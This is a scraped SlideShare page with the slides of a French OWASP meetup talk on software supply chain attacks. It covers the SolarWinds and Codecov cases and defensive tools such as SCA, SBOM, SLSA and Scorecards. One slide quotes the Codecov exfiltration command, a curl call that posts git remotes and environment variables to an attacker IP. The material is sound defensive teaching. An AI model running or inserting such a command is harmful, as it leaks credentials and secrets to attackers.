際際滷

際際滷Share a Scribd company logo
REX
CraftConf 2022
OWASP France
Meetup juin 2022
Supply Chain Attacks
+650%
(Sonatype 2021 report - https://www.sonatype.com/resources/state-of-the-software-supply-chain-2021)
Exemples
SolarWinds/Orion
- Initial Access: ???
CodeCov
- OpenSource App de scan de code
- Initial Access: mot de passe dans une
image docker
- Exfiltration: curl -sm 0.5 -d "$(git
remote -v)<<<<<< ENV $(env)"
http://ATTACKERIP/upload/v2 ||
true
https://blog.gitguardian.com/codecov-supply-chain-breach/
Google/Eric Brewer
Google  Nation-grade attackers
- 1 giant codebase
- Single trusted build system
- Proof that code review happened
- Knowledge of authors & reviewers
- Universal libs (same version)
- Private repos
Conseils/Outils/M辿thodes
- SCA (npm audit/python safety/)
- Choisissez / valuer vos
d辿pendances
- R辿duire le nombre de
d辿pendances
- Update or die
- SBOM (Dependency Track!) /
Savoir ce qui tourne sur votre
cluster / en production
- Educate!
https://twitter.com/garrows/status/1
065217184643768320?lang=fr
(Google) Conseils/Outils/M辿thodes
- SLSA:
https://github.com/slsa-framework/s
lsa
- OpenSSF Security ScoreCards:
https://github.com/ossf/scorecard
- Open Source Insights :
https://deps.dev
- https://osv.dev/
OpenSource is like a puppy
Come for free but with responsibility

More Related Content

Similar to REX CraftConf 2022 / Supply Chain Attack (14)

PDF
Preventing Supply Chain Attacks on Open Source Software
All Things Open
PDF
What is the Secure Supply Chain and the Current State of the PHP Ecosystem
sparkfabrik
PDF
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
lior mazor
PDF
20220603_pperego_openSUSE conference.pdf
Paolo Perego
PDF
Drupal Dev Days Vienna 2023 - What is the secure software supply chain and th...
sparkfabrik
PDF
Software Supply Chain Attacks (June 2021)
TzahiArabov
PPTX
All You need to Know about Secure Coding with Open Source Software
Javier Perez
PDF
Supply Chain Security for Containerised Workloads - Lee Chuk Munn
NUS-ISS
PDF
Tracy Miranda_DevOps Loop, May 2022.pdf
VMware Tanzu
PDF
Cracking the Code - Unveiling Synergies Between Open Source Security and AI.pdf
Priyanka Aash
PDF
Enhancing Software Supply Chain Resilience: Strategy for Mitigating Software ...
ijsc
PPTX
Application security meetup k8_s security with zero trust_29072021
lior mazor
PDF
OpenChain Webinar - AboutCode - Practical Compliance in One Stack Licensing...
Shane Coughlan
PPTX
Key Takeaways for Java Developers from the State of the Software Supply Chain...
Steve Poole
Preventing Supply Chain Attacks on Open Source Software
All Things Open
What is the Secure Supply Chain and the Current State of the PHP Ecosystem
sparkfabrik
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
lior mazor
20220603_pperego_openSUSE conference.pdf
Paolo Perego
Drupal Dev Days Vienna 2023 - What is the secure software supply chain and th...
sparkfabrik
Software Supply Chain Attacks (June 2021)
TzahiArabov
All You need to Know about Secure Coding with Open Source Software
Javier Perez
Supply Chain Security for Containerised Workloads - Lee Chuk Munn
NUS-ISS
Tracy Miranda_DevOps Loop, May 2022.pdf
VMware Tanzu
Cracking the Code - Unveiling Synergies Between Open Source Security and AI.pdf
Priyanka Aash
Enhancing Software Supply Chain Resilience: Strategy for Mitigating Software ...
ijsc
Application security meetup k8_s security with zero trust_29072021
lior mazor
OpenChain Webinar - AboutCode - Practical Compliance in One Stack Licensing...
Shane Coughlan
Key Takeaways for Java Developers from the State of the Software Supply Chain...
Steve Poole

More from Yvan PHELIZOT (6)

PDF
Smart XSS fuzzer
Yvan PHELIZOT
PDF
2019 meetup web_sec_crafting_securesoftware
Yvan PHELIZOT
PDF
Crafting Secure Software - DDDEU 2019
Yvan PHELIZOT
PDF
Arr棚tons de perdre du temps #NoEstimates
Yvan PHELIZOT
PDF
50 shades of fizzbuzz v2 - share
Yvan PHELIZOT
PDF
How to become a domain expert in no time?
Yvan PHELIZOT
Smart XSS fuzzer
Yvan PHELIZOT
2019 meetup web_sec_crafting_securesoftware
Yvan PHELIZOT
Crafting Secure Software - DDDEU 2019
Yvan PHELIZOT
Arr棚tons de perdre du temps #NoEstimates
Yvan PHELIZOT
50 shades of fizzbuzz v2 - share
Yvan PHELIZOT
How to become a domain expert in no time?
Yvan PHELIZOT
Ad

Recently uploaded (20)

PPTX
Enabling the Digital Artisan keynote at ICOCI 2025
Alan Dix
PDF
GDG Cloud Southlake #44: Eyal Bukchin: Tightening the Kubernetes Feedback Loo...
James Anderson
PPTX
2025 HackRedCon Cyber Career Paths.pptx Scott Stanton
Scott Stanton
PDF
Understanding AI Optimization AIO, LLMO, and GEO
CoDigital
PDF
Proactive Server and System Monitoring with FME: Using HTTP and System Caller...
Safe Software
PDF
Enhancing Environmental Monitoring with Real-Time Data Integration: Leveragin...
Safe Software
PDF
''Taming Explosive Growth: Building Resilience in a Hyper-Scaled Financial Pl...
Fwdays
PDF
How to Visualize the Spatio-Temporal Data Using CesiumJS
SANGHEE SHIN
PDF
Understanding The True Cost of DynamoDB Webinar
ScyllaDB
PDF
99 Bottles of Trust on the Wall Operational Principles for Trust in Cyber C...
treyka
PDF
DoS Attack vs DDoS Attack_ The Silent Wars of the Internet.pdf
CyberPro Magazine
PDF
Supporting the NextGen 911 Digital Transformation with FME
Safe Software
PDF
Bridging CAD, IBM TRIRIGA & GIS with FME: The Portland Public Schools Case
Safe Software
PPSX
Usergroup - OutSystems Architecture.ppsx
Kurt Vandevelde
PDF
Quantum Threats Are Closer Than You Think Act Now to Stay Secure
WSO2
PPTX
Smart Factory Monitoring IIoT in Machine and Production Operations.pptx
Rejig Digital
PDF
Lets Build Our First Slack Workflow! .pdf
SanjeetMishra29
PDF
TrustArc Webinar - Navigating APAC Data Privacy Laws: Compliance & Challenges
TrustArc
PDF
A Re-imagination of Embedded Vision System Design, a Presentation from Imag...
Edge AI and Vision Alliance
PDF
Scaling i.MX Applications Processors Native Edge AI with Discrete AI Accele...
Edge AI and Vision Alliance
Enabling the Digital Artisan keynote at ICOCI 2025
Alan Dix
GDG Cloud Southlake #44: Eyal Bukchin: Tightening the Kubernetes Feedback Loo...
James Anderson
2025 HackRedCon Cyber Career Paths.pptx Scott Stanton
Scott Stanton
Understanding AI Optimization AIO, LLMO, and GEO
CoDigital
Proactive Server and System Monitoring with FME: Using HTTP and System Caller...
Safe Software
Enhancing Environmental Monitoring with Real-Time Data Integration: Leveragin...
Safe Software
''Taming Explosive Growth: Building Resilience in a Hyper-Scaled Financial Pl...
Fwdays
How to Visualize the Spatio-Temporal Data Using CesiumJS
SANGHEE SHIN
Understanding The True Cost of DynamoDB Webinar
ScyllaDB
99 Bottles of Trust on the Wall Operational Principles for Trust in Cyber C...
treyka
DoS Attack vs DDoS Attack_ The Silent Wars of the Internet.pdf
CyberPro Magazine
Supporting the NextGen 911 Digital Transformation with FME
Safe Software
Bridging CAD, IBM TRIRIGA & GIS with FME: The Portland Public Schools Case
Safe Software
Usergroup - OutSystems Architecture.ppsx
Kurt Vandevelde
Quantum Threats Are Closer Than You Think Act Now to Stay Secure
WSO2
Smart Factory Monitoring IIoT in Machine and Production Operations.pptx
Rejig Digital
Lets Build Our First Slack Workflow! .pdf
SanjeetMishra29
TrustArc Webinar - Navigating APAC Data Privacy Laws: Compliance & Challenges
TrustArc
A Re-imagination of Embedded Vision System Design, a Presentation from Imag...
Edge AI and Vision Alliance
Scaling i.MX Applications Processors Native Edge AI with Discrete AI Accele...
Edge AI and Vision Alliance
Ad

REX CraftConf 2022 / Supply Chain Attack